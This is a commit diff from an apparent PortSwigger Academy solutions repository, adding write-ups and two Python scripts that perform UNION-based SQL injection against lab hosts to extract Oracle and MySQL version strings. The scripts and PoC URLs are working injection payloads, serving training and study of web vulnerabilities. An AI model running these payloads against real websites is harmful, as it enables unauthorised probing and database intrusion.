twseptian
diff --git a/‎port_swigger_academy/sqli/sqli_lab_07/README.md
Lines changed: 52 additions & 0 deletions b/‎port_swigger_academy/sqli/sqli_lab_07/README.md
Lines changed: 52 additions & 0 deletions
diff --git a/‎port_swigger_academy/sqli/sqli_lab_07/sqli_lab_07.py
Lines changed: 66 additions & 0 deletions b/‎port_swigger_academy/sqli/sqli_lab_07/sqli_lab_07.py
Lines changed: 66 additions & 0 deletions
diff --git a/‎port_swigger_academy/sqli/sqli_lab_08/README.md
Lines changed: 28 additions & 0 deletions b/‎port_swigger_academy/sqli/sqli_lab_08/README.md
Lines changed: 28 additions & 0 deletions
diff --git a/‎port_swigger_academy/sqli/sqli_lab_08/screenshot/1.png
121 KB b/‎port_swigger_academy/sqli/sqli_lab_08/screenshot/1.png
121 KB
diff --git a/‎port_swigger_academy/sqli/sqli_lab_08/screenshot/2.png
119 KB b/‎port_swigger_academy/sqli/sqli_lab_08/screenshot/2.png
119 KB
diff --git a/‎port_swigger_academy/sqli/sqli_lab_08/screenshot/3.png
111 KB b/‎port_swigger_academy/sqli/sqli_lab_08/screenshot/3.png
111 KB
diff --git a/‎port_swigger_academy/sqli/sqli_lab_08/sqli_lab_08.py
Lines changed: 66 additions & 0 deletions b/‎port_swigger_academy/sqli/sqli_lab_08/sqli_lab_08.py
Lines changed: 66 additions & 0 deletions
@@ -0,0 +1,52 @@
+# Examining the database in SQL injection attacks
+
+When exploiting  [SQL injection](https://portswigger.net/web-security/sql-injection)  vulnerabilities, it is often necessary to gather some information about the database itself. This includes the type and version of the database software, and the contents of the database in terms of which tables and columns it contains.
+
+## Querying the database type and version
+
+Different databases provide different ways of querying their version. You often need to try out different queries to find one that works, allowing you to determine both the type and version of the database software.
+
+The queries to determine the database version for some popular database types are as follows:
+
+|     |     |
+| --- | --- |
+| Database type | Query |
+| Microsoft, MySQL | `SELECT @@version` |
+| Oracle | `SELECT * FROM v$version` |
+| PostgreSQL | `SELECT version()` |
+
+For example, you could use a  `UNION`  attack with the following input:
+
+`' UNION SELECT @@version--`
+
+This might return output like the following, confirming that the database is Microsoft SQL Server, and the version that is being used:
+
+`Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64) Mar 18 2018 09:11:49 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build 14393: ) (Hypervisor)`
+
+# Lab: SQL injection attack, querying the database type and version on Oracle
+
+This lab contains an [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
+
+To solve the lab, display the database version string
+
+#### Hint
+
+On Oracle databases, every `SELECT` statement must specify a table to select `FROM`. If your `UNION SELECT` attack does not query from a table, you will still need to include the `FROM` keyword followed by a valid table name.
+
+There is a built-in table on Oracle called `dual` which you can use for this purpose. For example: `UNION SELECT 'abc' FROM dual`
+
+For more information, see our [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet).
+
+# PoC
+- retrive number of columns using `ORDER BY`. the number of columns is `2`
+- in manualy, we can retrive the version of oracle with following payload `https://ac451f281f465491c0091b6d00ff0036.web-security-academy.net/filter?category=Gifts' UNION SELECT 'test', banner FROM v$version--`
+```bash
+$ python3 sqli_lab_06c.py "https://ac6a1fef1eece449c0e14ad9000b0033.web-security-academy.net"
+
+    >> SQL injection attack, querying the database type and version on Oracle
+    >> by Port Swigger Academy
+
+[*]  Retrive dbms version...
+[✓]  Found the DBMS version.
+[✓]  The dbms version is 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production'
+```
@@ -0,0 +1,66 @@
+#!/usr/bin/python3
+import requests
+import sys
+import urllib3
+from bs4 import BeautifulSoup
+import re
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+class Interface ():
+    def __init__ (self):
+        self.red = '\033[91m'
+        self.green = '\033[92m'
+        self.white = '\033[37m'
+        self.yellow = '\033[93m'
+        self.bold = '\033[1m'
+        self.end = '\033[0m'
+
+    def header(self):
+        print('\n    >> SQL injection attack, querying the database type and version on Oracle')
+        print('    >> by Port Swigger Academy\n')
+
+    def info (self, message):
+        print(f"[{self.white}*{self.end}] {message}")
+
+    def warning (self, message):
+        print(f"[{self.yellow}!{self.end}] {message}")
+
+    def error (self, message):
+        print(f"[{self.red}x{self.end}] {message}")
+
+    def success (self, message):
+        print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")
+
+# Instantiate our interface class
+global output
+output = Interface()
+output.header()
+
+proxies = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
+
+
+def exploit_sqli_dbms_version(url):
+    path = '/filter?category=Pets'
+    sqli_payload = "' UNION SELECT 'test', banner FROM v$version--"
+    r = requests.get(url+path+sqli_payload,verify=False,proxies=proxies)
+    response = r.text
+    if 'Oracle' in response:
+        output.success(" Found the DBMS version.")
+        soup = BeautifulSoup(r.text, 'html.parser')
+        dbms_version = soup.find(text=re.compile('.*Oracle Database.*'))
+        output.success(" The dbms version is '%s'" % dbms_version)
+        return True
+    return False
+
+if __name__ == "__main__":
+    try:
+        url = sys.argv[1].strip()
+    except IndexError:
+        output.info(" Usage: %s <url>" % sys.argv[0])
+        output.info(" Example: %s www.example.com" % sys.argv[0])
+        sys.exit(-1)
+    
+    output.info(" Retrive dbms version...")
+    if not exploit_sqli_dbms_version(url):
+        output.error(" Did not find and dbms version")
@@ -0,0 +1,28 @@
+# Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
+
+This lab contains an  [SQL injection](https://portswigger.net/web-security/sql-injection)  vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
+
+To solve the lab, display the database version string.
+
+# PoC
+- retrieve the number of columns : `https://ac111faf1ee4c5b2c0342b4c002e004c.web-security-academy.net/filter?category=Accessories'+ORDER+BY+2%23` with url encode
+- 
+![1](screenshot/1.png)
+
+- check string data type: `https://ac111faf1ee4c5b2c0342b4c002e004c.web-security-academy.net/filter?category=Accessories'+UNION+SELECT+'test','test'%23`
+
+![2](screenshot/2.png)
+
+- retrive database version: `https://ac111faf1ee4c5b2c0342b4c002e004c.web-security-academy.net/filter?category=Accessories'+UNION+SELECT+'test',+%40%40version%23`
+
+![3](screenshot/3.png)
+
+```bash
+$ python3 sqli_lab_08.py "https://acca1f5a1ebf2974c0b351d2004100c6.web-security-academy.net"
+
+    >> SQL injection attack, querying the database type and version on MySQL and Microsoft
+    >> by Port Swigger Academy
+
+[*]  Retrieve dbms version...
+[✓]  The dbms version is '8.0.29'
+```
@@ -0,0 +1,66 @@
+#!/usr/bin/python3
+import requests
+import sys
+import urllib3
+from bs4 import BeautifulSoup
+import re
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+class Interface ():
+    def __init__ (self):
+        self.red = '\033[91m'
+        self.green = '\033[92m'
+        self.white = '\033[37m'
+        self.yellow = '\033[93m'
+        self.bold = '\033[1m'
+        self.end = '\033[0m'
+
+    def header(self):
+        print('\n    >> SQL injection attack, querying the database type and version on MySQL and Microsoft')
+        print('    >> by Port Swigger Academy\n')
+
+    def info (self, message):
+        print(f"[{self.white}*{self.end}] {message}")
+
+    def warning (self, message):
+        print(f"[{self.yellow}!{self.end}] {message}")
+
+    def error (self, message):
+        print(f"[{self.red}x{self.end}] {message}")
+
+    def success (self, message):
+        print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")
+
+# Instantiate our interface class
+global output
+output = Interface()
+output.header()
+
+proxies = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
+
+
+def exploit_sqli_dbms_version(url):
+    path = '/filter?category=Pets'
+    sqli_payload = "'+UNION+SELECT+NULL,%40%40version%23"
+    r = requests.get(url+path+sqli_payload,verify=False,proxies=proxies)
+    response = r.text
+    soup = BeautifulSoup(r.text, 'html.parser')
+    dbms_version = soup.find(text=re.compile('.*\d{1,2}\.\d{1,2}\.\d{1,2}.*'))
+    if dbms_version is None:
+        return False
+    else:
+        output.success(" The dbms version is '%s'" % dbms_version)
+        return True
+
+if __name__ == "__main__":
+    try:
+        url = sys.argv[1].strip()
+    except IndexError:
+        output.info(" Usage: %s <url>" % sys.argv[0])
+        output.info(" Example: %s www.example.com" % sys.argv[0])
+        sys.exit(-1)
+    
+    output.info(" Retrieve dbms version...")
+    if not exploit_sqli_dbms_version(url):
+        output.error(" Did not find and dbms version")